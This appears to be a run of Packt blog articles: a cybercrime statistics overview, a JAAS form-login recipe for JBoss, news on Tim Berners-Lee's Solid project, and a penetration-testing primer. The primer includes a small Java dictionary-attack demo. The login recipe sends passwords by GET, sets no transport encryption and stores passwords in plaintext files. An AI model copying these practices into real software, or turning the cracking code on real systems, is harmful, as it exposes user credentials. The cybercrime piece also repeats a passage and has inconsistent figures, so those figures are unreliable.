Hackers inject specialist software with which they try to take administrative control of a computerized network or system. If the attack is successful, the stolen data can be sold on the dark web and compromise people’s integrity and safety by intruding and abusing the privacy of products as well as sensitive personal and business information. Hacking is particularly dangerous when it compromises the operation of systems that manage physical infrastructure, for example, public transportation. Distributed denial of service (DDoS) attacks When an online service is targeted by a DDoS attack, the communication links overflow with data from messages sent simultaneously by botnets. Botnets are a bunch of controlled computers that stop legitimate access to online services for users. The system is unable to provide normal access as it cannot handle the huge volume of incoming traffic. Cybercrime in relation to overall computer crime Many moons have passed since 2001, when the first international treatythat targeted Internet and computer crime—the Budapest Convention on Cybercrime—was adopted. The Convention’s intention was to harmonize national laws, improve investigative techniques, and increase cooperation among nations. It was drafted with the active participation of the Council of Europe's observer states Canada, Japan, South Africa, and the United States and drawn up by the Council of Europe in Strasbourg, France. Brazil and Russia, on the other hand, refused to sign the document on the basis of not being involved in the Convention's preparation. In The Understanding Cybercrime: A Guide to Developing Countries(Gercke, 2011), Marco Gercke makes an excellent final point: “Not all computer-related crimes come under the scope of cybercrime. Cybercrime is a narrower notion than all computer-related crime because it has to include a computer network. On the other hand, computer-related crime in general can also affect stand-alone computer systems.” Although progress has been made, consensus over the definition of cybercrime is not final. Keeping history in mind, a fluid and developing approach must be kept in mind when applying working and legal interpretations. In the end, international noncompliance must be overcome to establish a common and safe ground to tackle persistent threats. Cybercrime localized – what is the risk in your region? Europol’s heat map for the period between 2014 and 2015 reports on the geographical distribution of cybercrime on the basis of the United Nations geoscheme. The data in the report encompassed cyber-dependent crime and cyber-enabled fraud, but it did not include investigations into online child sexual abuse. North and South America Due to its overwhelming presence, it is not a great surprise that the North American region occupies several lead positions concerning cybercrime, both in terms of enabling malicious content and providing residency to victims in the regions that participate in the global cybercrime numbers. The United States hosted between 20% and nearly 40% of the total world's command-and-control servers during 2014. Additionally, the US currently hosts over 45% of the world's phishing domains and is in the pack of world-leading spam producers. Between 16% and 20% percent of all global bots are located in the United States, while almost a third of point-of-sale malware and over 40% of all ransomware incidents were detected there. 
Twenty EU member states have initiated criminal procedures in which the parties under suspicion were located in the United States. In addition, over 70 percent of the countries located in the Single European Payment Area have been subject to losses from skimmed payment cards because of the distinct way in which the US, under certain circumstances, processes card payments without chip-and-PIN technology. There are instances of cybercrime in South America, but the scope of participation by the southern continent is way smaller than that of its northern neighbor, both in industry reporting and in criminal investigations. Ecuador, Guatemala, Bolivia, Peru, and Brazil are constantly rated high on the malware infection scale, and the situation is not changing, while Argentina and Colombia remain among the top 10 spammer countries. Brazil has a critical role in point-of-sale malware, ATM malware, and skimming devices. Europe The key aspect making Europe a region with excellent cybercrime potential is the fast, modern, and reliable ICT infrastructure. According to The Internet Organised Crime Threat Assessment (IOCTA) 2015, Cybercriminals abuse Western European countries to host malicious content and launch attacks inside and outside the continent. EU countries host approximately 13 percent of the global malicious URLs, out of which Netherlands is the leading country, while Germany, the U.K., and Portugal come second, third, and fourth respectively. Germany, the U.K., the Netherlands, France, and Russia are important hosts for bot C&C infrastructure and phishing domains, while Italy, Germany, the Netherlands, Russia, and Spain are among the top sources of global spam. Scandinavian countries and Finland are famous for having the lowest malware infection rates. France, Germany, Italy, and to some extent the U.K. have the highest malware infection rates and the highest proportion of bots found within the EU. However, the findings are presumably the result of the high population of the aforementioned EU countries. A half of the EU member states identified criminal infrastructure or suspects in the Netherlands, Germany, Russia, or the United Kingdom. One third of the European law enforcement agencies confirmed connections to Austria, Belgium, Bulgaria, the Czech Republic, France, Hungary, Italy, Latvia, Poland, Romania, Spain, or Ukraine. Asia China is the United States' counterpart in Asia in terms of the top position concerning reported threats to Internet security. Fifty percent of the EU member states' investigations on cybercrime include offenders based in China. Moreover, certain authorities quote China as the source of one third of all global network attacks. In the company of India and South Korea, China is third among the top-10 countries hosting botnet C&C infrastructure, and it has one of the highest global malware infection rates. India, Indonesia, Malaysia, Taiwan, and Japan host serious bot numbers, too. Japan takes on a significant part both as a source country and as a victim of cybercrime. Apart from being an abundant spam source, Japan is included in the top three Asian countries where EU law enforcement agencies have identified cybercriminals. On the other hand, Japan, along with South Korea and the Philippines, is the most popular country in the East and Southeast region of Asia where organized crime groups run sextortion campaigns. Vietnam, India, and China are the top Asian countries featuring spamming sources. 
Alternatively, China and Hong Kong are the most prominent locations for hosting phishing domains. From another point of view, the country code top-level domains (ccTLDs) for Thailand and Pakistan are commonly used in phishing attacks. In this region, most SEPA members reported losses from the use of skimmed cards. In fact, five (Indonesia, Philippines, South Korea, Vietnam, and Malaysia) out of the top six countries are from this region. Africa Africa remains renowned for combined and sophisticated cybercrime practices. Data from the Europol heat map report indicates that the African region holds a ransomware-as-a-service presence equivalent to the one of the European black market. Cybercriminals from Africa make profits from the same products. Nigeria is on the list of the top 10 countries compiled by the EU law enforcement agents featuring identified cybercrime perpetrators and related infrastructure. In addition, four out of the top five top-level domains used for phishing are of African origin: .cf, .za, .ga, and .ml. Australia and Oceania Australia has two critical cybercrime claims on a global level: First, the country is present in several top-10 charts in the cybersecurity industry, including bot populations, ransomware detection, and network attack originators. Second, the country-code top-level domain for the Palau Islands in Micronesia is massively used by Chinese attackers as the TLD with the second highest proportion of domains used for phishing. Cybercrime in numbers Experts agree that the past couple of years have seen digital extortion flourishing. In 2015 and 2016, cybercrime reached epic proportions. Although there is agreement about the serious rise of the threat, putting each ransomware aspect into numbers is a complex issue. Underreporting is not an issue only in academic research but also in practical case scenarios. The threat to businesses around the world is growing, because businesses keep it quiet. The scope of extortion is obscured because companies avoid reporting and pay the ransom in order to settle the issue in a conducive way. As far as this goes for corporations, it is even more relevant for public enterprises or organizations that provide a public service of any kind. Government bodies, hospitals, transportation companies, and educational institutions are increasingly targeted with digital extortion. Cybercriminals estimate that these targets are likely to pay in order to protect drops in reputation and to enable uninterrupted execution of public services. When CEOs and CIOs keep their mouths shut, relying on reported cybercrime numbers can be a tricky question. The real picture is not only what is visible in the media or via professional networking, but also what remains hidden and is dealt with discreetly by the security experts. In the second quarter of 2015, Intel Security reported an increase in ransomware attacks by 58%. Just in the first 3 months of 2016, cybercriminals amassed $209 million from digital extortion. By making businesses and authorities pay the relatively small average ransom amount of $10,000 per incident, extortionists turn out to make smart business moves. Companies are not shaken to the core by this amount. Furthermore, they choose to pay and get back to business as usual, thus eliminating further financial damages that may arise due to being out of business and losing customers. Extortionists understand the nature of ransom payment and what it means for businesses and institutions. As sound entrepreneurs, they know their market. 
Instead of setting unreasonable skyrocketing prices that may cause major panic and draw severe law enforcement action, they keep it low profile. In this way, they maintain the dark business in flow, moving from one victim to the next and evading legal measures. A peculiar perspective – Cybercrime in absolute and normalized numbers “To get an accurate picture of the security of cyberspace, cybercrime statistics need to be expressed as a proportion of the growing size of the Internet similar to the routine practice of expressing crime as a proportion of a population, i.e., 15 murders per 1,000 people per year.” This statement by Eric Jardine from the Global Commission on Internet Governance (Jardine, 2015) launched a new perspective of cybercrime statistics, one that accounts for the changing nature and size of cyberspace. The approach assumes that viewing cybercrime findings isolated from the rest of the changes in cyberspace provides a distorted view of reality. The report aimed at normalizing crime statistics and thus avoiding negative, realistic cybercrime scenarios that emerge when drawing conclusions from the limited reliability of absolute numbers. In general, there are three ways in which absolute numbers can be misinterpreted: Absolute numbers can negatively distort the real picture, while normalized numbers show whether the situation is getting better Both numbers can show that things are getting better, but normalized numbers will show that the situation is improving more quickly Both numbers can indicate that things are deteriorating, but normalized numbers will indicate that the situation is deteriorating at a slower rate than absolute numbers Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and anything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties. Normally, this entangles the clarity of the findings of cybercrime presence in the digital world. When data is borrowed from multiple resources and missing slots are modified with hypothetical numbers, the end result can be skewed. Keeping in mind this observation, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for eight key aspects: The number of active mobile broadband subscriptions The number of smartphones sold to end users The number of domains and websites The volume of total data flow The volume of mobile data flow The annual number of Google searches The Internet’s contribution to GDP It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy compared to the previous year, whereas 78% were concerned about having their banking credentials hacked. 
Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and everything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties, which normally clouds the clarity of findings about the presence of cybercrime in the digital world. When data is borrowed from multiple sources and missing slots are filled with hypothetical numbers, the end result can be skewed. Keeping this observation in mind, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for the following key aspects:

- The number of active mobile broadband subscriptions
- The number of smartphones sold to end users
- The number of domains and websites
- The volume of total data flow
- The volume of mobile data flow
- The annual number of Google searches
- The Internet's contribution to GDP

It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy compared to the previous year, whereas 78% were concerned about having their banking credentials hacked. Additionally, 77% of users were worried about cybercriminals stealing private images and messages. These perceptions led to behavioral changes: 43% of users started avoiding certain sites and applications, some 39% regularly updated passwords, while about 10% used the Internet less (CIGI-Ipsos, 2014).

The GCIG report results are indicative of a heterogeneous cybersecurity picture. Although many cybersecurity aspects are deteriorating over time, some are staying constant, and a surprising number are actually improving. Jardine compares the security of cyberspace to crime-rate trends in a specific country, operationalizing cyber attacks via the 13 measures presented in the following table, as seen in Table 2, Summary Statistics for the Security of Cyberspace (E. Jardine, GCIG Report, p. 6):

| Measure | Minimum | Maximum | Mean | Standard Deviation |
| --- | --- | --- | --- | --- |
| New Vulnerabilities | 4,814 | 6,787 | 5,749 | 781.880 |
| Malicious Web Domains | 29,927 | 74,000 | 53,317 | 13,769.99 |
| Zero-day Vulnerabilities | 8 | 24 | 14.85714 | 6.336 |
| New Browser Vulnerabilities | 232 | 891 | 513 | 240.570 |
| Mobile Vulnerabilities | 115 | 416 | 217.35 | 120.85 |
| Botnets | 1,900,000 | 9,437,536 | 4,485,843 | 2,724,254 |
| Web-based Attacks | 23,680,646 | 1,432,660,467 | 907,597,833 | 702,817,362 |
| Average per Capita Cost | 188 | 214 | 202.5 | 8.893818078 |
| Organizational Cost | 5,403,644 | 7,240,000 | 6,233,941 | 753,057 |
| Detection and Escalation Costs | 264,280 | 455,304 | 372,272 | 83,331 |
| Response Costs | 1,294,702 | 1,738,761 | 1,511,804 | 152,502.2526 |
| Lost Business Costs | 3,010,000 | 4,592,214 | 3,827,732 | 782,084 |
| Victim Notification Costs | 497,758 | 565,020 | 565,020 | 30,342 |

While reading the table results, an essential caveat must be kept in mind: statistics for cybercrime costs are not available worldwide. The author worked with the assumption that data on US costs of cybercrime indicates costs on a global level. For obvious reasons, however, this assumption may not hold, and many countries will have had significantly lower costs than the US. To mitigate the assumption's flaws, the author provides comparative levels of those measures. The organizational cost of data breaches in 2013 in the United States was a little less than six million US dollars, while the average on the global level, drawn from the Ponemon Institute's annual Cost of Data Breach Study (from 2011, 2013, and 2014, via Jardine, p. 7), which measured the overall cost of data breaches including the US ones, was US$2,282,095. The conclusion is that the US numbers will distort global cost findings by inflating the real costs, and will thus work against the paper's suggestion that normalized numbers paint a rosier picture than the one provided by absolute numbers.

Summary

In this article, we covered the birth and concept of cybercrime and the challenges law enforcement, academia, and security professionals face when combating its threatening behavior. We also explored the impact of cybercrime, in numbers, on varied geographical regions, industries, and devices.

Resources for Article:

Further resources on this subject:
Interactive Crime Map Using Flask [article]
Web Scraping with Python [article]
JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.)

The deployment descriptor is the main configuration file of all web applications. The container first looks for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd. The following are the schema elements available in the XSD:

<xsd:element name="security-constraint" type="j2ee:security-constraintType"/>
<xsd:element name="login-config" type="j2ee:login-configType"/>
<xsd:element name="security-role" type="j2ee:security-roleType"/>

Getting ready

You will need the following to demonstrate authentication and authorization:

- JBoss 7
- Eclipse Indigo 3.7
- Create a dynamic web project and name it Security Demo
- Create a package, com.servlets
- Create an XML file in the WebContent folder, jboss-web.xml
- Create two JSP pages, login.jsp and logoff.jsp

How to do it...

Perform the following steps to achieve JAAS-based security for JSPs:

1. Edit the login.jsp file with the input fields j_username and j_password, and submit them to SecurityCheckerServlet:

<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page language="java" %>
<html>
<HEAD>
<TITLE>PACKT Login Form</TITLE>
<SCRIPT>
function submitForm() {
  var frm = document.myform;
  if (frm.j_username.value == "") {
    alert("please enter your username, its empty");
    frm.j_username.focus();
    return;
  }
  if (frm.j_password.value == "") {
    alert("please enter the password, its empty");
    frm.j_password.focus();
    return;
  }
  frm.submit();
}
</SCRIPT>
</HEAD>
<BODY>
<FORM name="myform" action="SecurityCheckerServlet" METHOD=get>
<TABLE width="100%" border="0" cellspacing="0" cellpadding="5" bgcolor="white">
  <TR align="center">
    <TD align="right" class="Prompt"></TD>
    <TD align="left">
      <INPUT type="text" name="j_username" maxlength=20>
    </TD>
  </TR>
  <TR align="center">
    <TD align="right" class="Prompt"></TD>
    <TD align="left">
      <INPUT type="password" name="j_password" maxlength=20>
    </TD>
  </TR>
  <TR align="center">
    <TD align="right" class="Prompt"></TD>
    <TD align="left">
      <input type="submit" onclick="javascript:submitForm();" value="Login">
    </TD>
  </TR>
</TABLE>
</FORM>
</BODY>
</html>

The j_username and j_password fields are the indicators of using form-based authentication.

2. Let's modify the web.xml file to protect all the files that end with .jsp. If you try to access any JSP file, you will be presented with a login form, which in turn calls SecurityCheckerServlet to authenticate the user. You can also see that role information is displayed. Update the web.xml file as shown in the following code snippet. We have used the 2.5 XSD.
The following code needs to be placed between the web-app tags in the web.xml file:

<display-name>jaas-jboss</display-name>
<welcome-file-list>
  <welcome-file>index.html</welcome-file>
  <welcome-file>index.htm</welcome-file>
  <welcome-file>index.jsp</welcome-file>
  <welcome-file>default.html</welcome-file>
  <welcome-file>default.htm</welcome-file>
  <welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>something</web-resource-name>
    <description>Declarative security tests</description>
    <url-pattern>*.jsp</url-pattern>
    <http-method>HEAD</http-method>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
    <http-method>PUT</http-method>
    <http-method>DELETE</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>role1</role-name>
  </auth-constraint>
  <user-data-constraint>
    <description>no description</description>
    <transport-guarantee>NONE</transport-guarantee>
  </user-data-constraint>
</security-constraint>
<login-config>
  <auth-method>FORM</auth-method>
  <form-login-config>
    <form-login-page>/login.jsp</form-login-page>
    <form-error-page>/logoff.jsp</form-error-page>
  </form-login-config>
</login-config>
<security-role>
  <description>some role</description>
  <role-name>role1</role-name>
</security-role>
<security-role>
  <description>packt managers</description>
  <role-name>manager</role-name>
</security-role>
<servlet>
  <description></description>
  <display-name>SecurityCheckerServlet</display-name>
  <servlet-name>SecurityCheckerServlet</servlet-name>
  <servlet-class>com.servlets.SecurityCheckerServlet</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>SecurityCheckerServlet</servlet-name>
  <url-pattern>/SecurityCheckerServlet</url-pattern>
</servlet-mapping>
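The declarative constraints above can be complemented with programmatic checks inside any protected servlet or JSP. The following is a minimal sketch that is not part of the original recipe; the class name RoleCheckServlet is made up, but getRemoteUser() and isUserInRole() are standard Servlet API calls, and role1 is the role declared in the web.xml above:

package com.servlets;

import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Minimal sketch: programmatic authorization that complements the
// declarative constraints. The container populates getRemoteUser() and
// isUserInRole() after FORM authentication succeeds.
public class RoleCheckServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        if (request.getRemoteUser() == null) {
            response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }
        if (!request.isUserInRole("role1")) { // role declared in web.xml
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }
        response.getWriter().println("Welcome, " + request.getRemoteUser());
    }
}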
3. JAAS security checker and credential handler: the servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandler, and add all the other necessary imports. In the following SecurityCheckerServlet, we take the input from the JSP file and pass it to the CallbackHandler. We then pass the handler object to the LoginContext class, whose login() method performs the authentication. On successful authentication, it creates a Subject and Principal for the user, with the user's details. We use the Iterator interface to iterate over the principals of the authenticated Subject and retrieve the user details.

In the SecurityCheckerServlet class:

package com.servlets;

public class SecurityCheckerServlet extends HttpServlet {
  private static final long serialVersionUID = 1L;

  public SecurityCheckerServlet() {
    super();
  }

  protected void doGet(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {
    char[] password = null;
    PrintWriter out = response.getWriter();
    try {
      SecurityAssociationHandler handler = new SecurityAssociationHandler();
      SimplePrincipal user = new SimplePrincipal(request.getParameter("j_username"));
      password = request.getParameter("j_password").toCharArray();
      handler.setSecurityInfo(user, password);
      // Never log passwords, even while debugging a security recipe
      CallbackHandler myHandler = new UserCredentialHandler(
          request.getParameter("j_username"), request.getParameter("j_password"));
      LoginContext lc = new LoginContext("other", myHandler);
      lc.login();
      Subject subject = lc.getSubject();
      Iterator it = subject.getPrincipals().iterator();
      while (it.hasNext()) {
        // Read each principal only once per iteration
        Object principal = it.next();
        System.out.println("Authenticated: " + principal + "<br>");
        out.println("<b><html><body><font color='green'>Authenticated: "
            + request.getParameter("j_username") + " <br/>" + principal
            + "<br/></font></b></body></html>");
      }
      it = subject.getPublicCredentials(Properties.class).iterator();
      while (it.hasNext())
        System.out.println(it.next().toString());
      lc.logout();
    } catch (Exception e) {
      out.println("<b><font color='red'>failed authentication.</font></b>" + e);
    }
  }

  protected void doPost(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {
  }
}

4. Create the UserCredentialHandler file:

package com.servlets;

class UserCredentialHandler implements CallbackHandler {
  private String user, pass;

  UserCredentialHandler(String user, String pass) {
    super();
    this.user = user;
    this.pass = pass;
  }

  @Override
  public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException {
    for (int i = 0; i < callbacks.length; i++) {
      if (callbacks[i] instanceof NameCallback) {
        NameCallback nc = (NameCallback) callbacks[i];
        nc.setName(user);
      } else if (callbacks[i] instanceof PasswordCallback) {
        PasswordCallback pc = (PasswordCallback) callbacks[i];
        pc.setPassword(pass.toCharArray());
      } else {
        throw new UnsupportedCallbackException(callbacks[i], "Unrecognized Callback");
      }
    }
  }
}

5. In the jboss-web.xml file:

<?xml version="1.0" encoding="UTF-8"?>
<jboss-web>
  <security-domain>java:/jaas/other</security-domain>
</jboss-web>

Here, other is the name of the application policy defined in the login-config.xml file. All of this will be packaged as a .war file.

6. Configuring the JBoss application server: go to jboss-5.1.0.GA\server\default\conf\login-config.xml in JBoss. If you look at the file, you can see various configurations for database, LDAP, and a simple one using properties files, which is used in the following code snippet:

<application-policy name="other">
  <!-- A simple server login module, which can be used when the number of
       users is relatively small. It uses two properties files:
       users.properties, which holds users (key) and their password (value).
       roles.properties, which holds users (key) and a comma-separated list
       of their roles (value).
       The unauthenticatedIdentity property defines the name of the principal
       that will be used when a null username and password are presented, as
       is the case for an unauthenticated web client or MDB. If you want to
       allow such users to be authenticated, add the property, e.g.,
       unauthenticatedIdentity="nobody" -->
  <authentication>
    <login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag="required">
      <module-option name="usersProperties">users.properties</module-option>
      <module-option name="rolesProperties">roles.properties</module-option>
      <module-option name="unauthenticatedIdentity">nobody</module-option>
    </login-module>
  </authentication>
</application-policy>

7. Create the users.properties and roles.properties files in the same folder. The following shows a username mapped to a password, and to a role:
users.properties:

anjana=anjana123

roles.properties:

anjana=role1

8. Restart the server.

How it works...

JAAS consists of a set of interfaces to handle the authentication process. They are:

- The CallbackHandler and Callback interfaces
- The LoginModule interface
- LoginContext

The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific; each container has its own implementation, and here we are using the JBoss application server to demonstrate JAAS. In the previous example, the JAAS interfaces are called explicitly. UserCredentialHandler implements the CallbackHandler interface. So, CallbackHandlers are storage spaces for the user credentials, and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to the LoginModule interface for authentication:

CallbackHandler myHandler = new UserCredentialHandler(
    request.getParameter("j_username"), request.getParameter("j_password"));
LoginContext lc = new LoginContext("other", myHandler);
lc.login();

The web.xml file defines the security mechanisms and also points us to the protected resources in our application. On a failed authentication, the user sees the error page; on success, the authenticated principal is displayed.

Summary

We introduced the JAAS-based mechanism of applying security to authenticate and authorize users to the application.

Resources for Article:

Further resources on this subject:
Spring Security 3: Tips and Tricks [Article]
Spring Security: Configuring Secure Passwords [Article]
Migration to Spring Security 3 [Article]

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

Sugandha Lahoti
25 Oct 2018
4 min read
At the ongoing 40th ICDPPC, the International Conference of Data Protection and Privacy Commissioners, Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference, which is taking place in Brussels this week, brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high-profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor, on 'Choose Humanity: Putting Dignity back into Digital'; a video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO of Apple, on personal data and user privacy; and 'What is Ethics?' by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania, among others.

Per Techcrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. "Ethics, like technology, is design. As we're designing the system, we're designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society," he told the delegates present at the conference.

He also described digital platforms as "socio-technical systems", meaning "it's not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written". "We must consciously decide on both of these, both the social side and the technical side," he said. "The tech platforms are anthropogenic. They're made by people. They're coded by people. And the people who code them are constantly trying to figure out how to make them better."

According to Techcrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how socio-technical systems are exploding simple notions of individual rights. "Your data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it's not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too."

He also revealed new plans for his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to get rid of gigantic tech monopolies' (Facebook, Google, Amazon, and so on) stronghold over user data. He hopes to achieve this with Inrupt's new open source project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data: the app asks you where you want to put your data, so you can run your photo app or take pictures on your phone and say, I want to store them on Dropbox, or I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store. "The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up.
You are in control of your data life… Wherever you store it you can control and get access to it."

He concluded by saying, "We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out."

The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely the Universal Guidelines on Artificial Intelligence, at the ICDPPC.

Tim Berners-Lee plans to decentralize the web with 'Solid', an open-source project for "personal empowerment through data"
EPIC's Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018
California's tough net neutrality bill passes state assembly vote.

Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data”

Natasha Mathur
01 Oct 2018
4 min read
Tim Berners-Lee, the creator of the world wide web, revealed his plans for changing the web for the better as he launched his new startup, Inrupt, last Friday. His major goal with Inrupt is to decentralize the web and get rid of the tech giants' (Facebook, Google, Amazon, and so on) monopolies on user data. He hopes to achieve this with Inrupt's new open source project, Solid, a platform built using the existing web format. Tim has been working on Solid over recent years in collaboration with people at MIT.

"I've always believed the web is for everyone. That's why I and others fight fiercely to protect it. The changes we've managed to bring have created a better and more connected world. But for all the good we've achieved, the web has evolved into an engine of inequity and division; swayed by powerful forces who use it for their own agendas," said Tim in his announcement blog post.

Solid to provide users with more control over their data

Solid will work on completely changing the current web model, in which users hand over their personal data to digital giants "in exchange for perceived value". "Solid is how we evolve the web in order to restore balance - by giving every one of us complete control over data, personal or not, in a revolutionary way," says Tim.

Solid offers every user a choice regarding where data gets stored, which specific people and groups can access select elements in the data, and which apps you use. It will enable you, your family, and colleagues to link and share data with anyone. Also, with Solid, people can look at the same data with different apps at the same time. Solid technology is built on existing web formats, and developers will have to integrate Solid into their apps and sites. Solid hopes to empower individuals, developers, and businesses across the globe with totally new ways to build and find innovative and trusted applications. "I see multiple market possibilities, including Solid apps and Solid data storage," adds Tim.

According to Katrina Brooker, writer at FastCompany, every bit of data you create or add on Solid exists within a Solid pod. A Solid pod is a personal online data store. These pods provide Solid users with control over their applications and information on the web. Whoever uses the Solid platform gets a Solid identity and a Solid pod. This is how Solid will enforce "personal empowerment through data", by helping users take back the power of the web from gigantic corporations.

Additionally, Tim told Brooker that he's currently working on a way to create a decentralized version of Alexa, Amazon's popular digital assistant. "He calls it Charlie. Unlike with Alexa, on Charlie people would own all their data. That means they could trust Charlie with, for example, health records, children's school events, or financial records. That is the kind of machine Berners-Lee hopes will spring up all over Solid to flip the power dynamics of the web from corporations to individuals," writes Brooker.

Given the recent Facebook security breach that compromised 50M user accounts, and past data misuse scandals such as the Cambridge Analytica scandal, Solid seems to be an angel in disguise that will transfer the power of data control into the hands of users. However, there's no guarantee that Solid will be widely accepted by everyone, as a lot of companies on the web are extremely sensitive when it comes to their data. They might not be interested in losing control over that data.
But, it’s definitely going to take us one step ahead, to a more free and open Internet. Tim has taken a sabbatical from MIT and has reduced his day-to-day involvement with the World Wide Web Consortium (W3C) to work full time on Inrupt. “It is going to take a lot of effort to build the new Solid platform and drive broad adoption but I think we have enough energy to take the world to a new tipping point,” says Tim. For more coverage on this news, check out the official Inrupt blog.

Fundamentals

Packt
20 Jan 2014
4 min read
(For more resources related to this topic, see here.)

Vulnerability Assessment and Penetration Testing

Vulnerability Assessment (VA) and Penetration Testing (PT or PenTest) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide the best outcomes if they are used optimally. An improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by all, from small organizations to large enterprises, to assess their security status. This helps them make timely decisions to protect themselves from these vulnerabilities. Nessus is a widely recognized tool for conducting Vulnerability Assessments and PenTests. This section introduces you to basic terminology with reference to these two types of assessments.

A vulnerability, in terms of IT systems, can be defined as a potential weakness in a system or infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute-force (dictionary) attack attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system. The sketch that follows makes this example concrete.
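The following is a minimal sketch of a dictionary attack against a password hash; the wordlist, the target hash, and the use of plain SHA-256 are all hypothetical stand-ins for whatever the assessed system actually uses (real systems typically salt their hashes, and real tools read large wordlists from disk):

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

// Minimal sketch of a dictionary attack: hash each candidate word and
// compare it against a (hypothetical) stolen password hash.
public class DictionaryCheck {

    public static void main(String[] args) throws Exception {
        String targetHash = sha256("dragon"); // hypothetical stolen hash
        String[] wordlist = {"123456", "password", "qwerty", "dragon"};
        for (String candidate : wordlist) {
            if (sha256(candidate).equals(targetHash)) {
                System.out.println("Weak password found: " + candidate);
                return;
            }
        }
        System.out.println("No dictionary word matched.");
    }

    private static String sha256(String s) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256")
                .digest(s.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }
}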
Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual checklist-based approach that uses best practices and the vulnerabilities published on well-known vulnerability-tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming; the kinds of checks that are performed by a vulnerability assessment tool can also be done manually, but this takes far longer than an automated tool.

